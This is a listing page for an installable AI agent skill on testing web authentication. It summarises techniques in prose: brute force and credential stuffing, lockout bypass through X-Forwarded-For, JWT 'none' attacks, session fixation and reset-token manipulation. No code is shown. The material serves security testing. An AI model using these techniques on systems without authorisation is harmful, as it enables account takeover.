Broken Authentication Testing
This skill should be used when the user asks to "test for broken authentication vulnerabilities", "assess session management security", "perform credential stuffing tests", "evaluate password policies", "test for session fixation", or "identify authentication bypass flaws". It provides comprehensive techniques for identifying authentication and session management weaknesses in web applications.
Author
zebbern
Category
Other ToolsInstall
Download and extract to your skills directory
Copy command and send to OpenClaw for auto-install:
Broken Authentication Testing - Comprehensive Skills for Testing Authentication Vulnerabilities
Skill Overview
Broken Authentication Testing is a penetration testing skill focused on detecting the security of web application authentication and session management. It covers 10 major testing areas including password policies and session security, helping security professionals systematically uncover authentication vulnerabilities from the OWASP Top 10.
Applicable Scenarios
Before enterprise applications go live or during regular security reviews, comprehensively test the security of authentication features such as login, registration, and password reset to identify high-risk vulnerabilities like account lockout bypass and session fixation.
Simulate real attack scenarios to test defenses against brute-force protection, credential stuffing, JWT token tampering, and other authentication bypass techniques, evaluating the system’s real-world defenses.
Combine with code review findings to validate authentication logic flaws in practice, verifying deep authentication security issues such as weak JWT signing, MFA bypasses, and password reset token manipulation.
Core Features
Systematically analyze the application’s authentication architecture (passwords, tokens, certificates, multi-factor), identify authentication endpoints, capture and analyze authentication requests to lay the groundwork for subsequent vulnerability discovery.
Covers the full authentication security testing chain including password policy, credential enumeration, brute-force, credential stuffing, session management, session fixation, timeout detection, MFA testing, and password reset.
Provides testing methods and payloads for real attack scenarios such as account lockout bypass, JWT "none" algorithm attacks, and password reset token manipulation that can be used directly for security verification.
Frequently Asked Questions
What are common types of authentication vulnerabilities?
The most common include weak password policies, lack of account lockout mechanisms, username enumeration leaks, session fixation, predictable session tokens, missing session timeouts, insecure password reset flows, and MFA bypasses. These vulnerabilities can lead to account takeover, privilege escalation, and other serious consequences.
How to test brute-force protection mechanisms?
Use tools like Hydra or Burp Intruder to perform dictionary attacks, observe whether the system triggers account lockout after repeated failed attempts, check whether lockout is based on IP or account, test whether restrictions can be bypassed via headers like X-Forwarded-For, and verify the trigger timing and effectiveness of CAPTCHAs.
How is a session fixation attack carried out?
An attacker first obtains an unauthenticated session token and then tricks the victim into using that token to log in. If the system does not regenerate the session token after login, the attacker can use that token to access the system as the victim. The test method is to compare the Cookie values before and after login; a secure system should assign a new session identifier upon authentication.